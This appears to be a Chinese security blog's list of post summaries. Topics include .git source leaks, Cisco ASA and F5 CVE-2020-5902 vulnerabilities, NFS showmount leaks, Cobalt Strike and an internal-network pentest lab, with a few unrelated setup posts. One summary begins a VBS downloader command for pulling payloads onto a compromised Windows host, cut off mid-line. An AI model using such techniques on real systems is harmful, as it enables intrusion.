摘要:
一、源码(备份文件)泄露 #####1、git泄露 Git是一个开源的分布式版本控制系统,在执行git init初始化目录的时候,会在当前目录下自动创建一个.git目录,用来记录代码的变更记录等。发布代码的时候,如果没有把.git这个目录删除,就直接发布到了服务器上,攻击者就可以通过它来恢复源代码 阅读全文
摘要:
1、漏洞描述 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞,允许未经身份验证的远程攻击者进行目录遍历攻击并读取目 阅读全文
摘要:
说多了都是泪,中午禁用一个开机启动项时把麦克风权限关闭了,开启了就能正常使用摄像头了。 阅读全文
摘要:
当获取到内网一台windows主机时,其不能上传shell,可以执行命令,这时候可以上传或者从我们的服务器上下载payload 1、vbs #首先先向windows写入一个vbs脚本 echo set a=createobject(^"adod^"+^"b.stream^"):set w=creat 阅读全文
摘要:
记录一下扫描和测试中遇到的一个漏洞:目标主机showmount -e信息泄露 先了解一下showmount命令: showmount命令用于查询NFS服务器 (NFS 网络文件系统) # showmount --help Usage: showmount [-adehv] [--all] [--di 阅读全文
摘要:
这几天通报了f5的一个漏洞,想着先弄个环境保存着,说不定后面就用到了。。 1、漏洞描述 近日,F5官方发布公告,修复了流量管理用户界面(TMUI)中存在的一个远程代码执行漏洞(CVE-2020-5902)。此漏洞允许未经身份验证的攻击者或经过身份验证的用户通过BIG-IP管理端口和/或自身IP对 阅读全文
摘要:
CobaltStrike的使用 Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。但现在已经独立出来了 1、安装 网上的资源和安装还是挺多的,但安全性可能就没保障了。 阅读全文
摘要:
1、安装anaconda3 wget https://mirrors.tuna.tsinghua.edu.cn/anaconda/archive/Anaconda3-5.0.1-Linux-x86_64.sh bash ~/Anaconda3-5.0.1-Linux-x86_64.sh #yes,E 阅读全文
摘要:
1、搭建环境: 内网中有一台win server2008服务器、一台linux主机,一台windows或linux主机 这里主要的目标是获得PC1的shell 2、信息搜集 nmap扫一下该服务器: 先访问一下80端口,发现有一个网站页面 先用nikto扫一下该网站:发现了网站的架构,还有一些网站的 阅读全文
摘要:
阿里云服务器安装jupyter 1、安装jupyter 这里网上一些文章大部分都需要先安装Anaconda或virtualenv虚拟环境,但我为了简便直接用pip3装jupyter;这里最好用pip3安装,如果你有python2和python3的环境的话就都可以使用 pip3 install jup 阅读全文